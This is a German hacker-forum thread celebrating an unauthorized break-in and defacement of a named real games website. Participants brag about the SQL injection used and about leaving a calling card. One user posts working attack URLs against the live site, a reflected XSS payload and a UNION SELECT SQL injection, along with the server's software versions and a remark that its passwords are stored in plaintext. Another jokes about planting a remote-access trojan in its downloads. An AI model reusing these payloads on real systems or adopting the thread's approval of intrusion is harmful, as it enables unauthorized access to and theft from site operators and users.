pcgamesdatabase.de owned

[/4ikon\]

Admin fixt grad xD

[Gabber Gandalf]

hmmm was ich nur daran nit so ganz verstehe was zum henker hat das hier in "Globale News" zu suchen? hättest den mist auch im OT posten können .....

[Sn0opY]

naja is insoweit ne szene news dass nicht hier einer von fh auf die idee kommt sich von der page was zu laden ;P so nen fud rat oder sowas aus den downlaod charts wäre doch was ^^

[-=Crypter=-]

Wurde schon gefixt Dx

[XX]

@Gabber Gandalf: Warum beschwerst Du Dich? Du hast doch Macht. Nutze sie einfach, wenn Du Dir Deiner Sache sicher bist.

XX

[lolly]

Hmmmm,

fand sehr schade, dass wir keine Bilder hochladen konnten. Allerdings muss ich sagen war bis jetzt die anspruchsvollste SQL-Injection und wir beide haben viel dabei gelernt.

War Sinn der Sache und ne kleine Visitenkarte hinterlassen nimmt uns doch keiner übel
@XX: Zwischen flamen und eigener Meinung ist ein Unterschied, finde Gabber Gandalfs post berechtigt und ist okay

MFG Lolly

[fred777]

Joa, die LÜcke gibts immer noch, wo der Sinn ist, naja...

[3ddyk]

nicht schlecht die seite mal auf fehler "aufmerksam" zu machen

[J0hn.X3r]

Admin fixt grad xD

Davon merk ich nichts, außer dass das Admin CP nicht mehr unter /admin/index.php zu erreichen ist.

Wurde schon gefixt Dx

Aehm ne?

Joa, die LÜcke gibts immer noch

Jep, zum Beispiel hier:

Iks Es Es (XSS ):

Code:

http://pcgamesdatabase.de/gamesoftheyear.php?tmpx=<script>alert(1337)</script>

und SQL Injection Vulnerability:

Code:

http://pcgamesdatabase.de/games_top10subgenre.php?genre_id=-1/**/UNION/**/SELECT/**/1,version(),3,4/*

Code:

Apache: 3.1.31
MySQL: 5.0.32-Debian_7etch1~bpo.1-log
PHP: 4.4.7

Uebrigens sollte mal jemand dem Admin sagen, die PW nicht plain zu speichern ~.~

[lolly]

Achja und nochmal big THX an J0hn.X3r der mir bei dummen Fragen hilfreich zur Seite stand (Ich Dummi wusste nicht wie man die Stripslashes umgeht)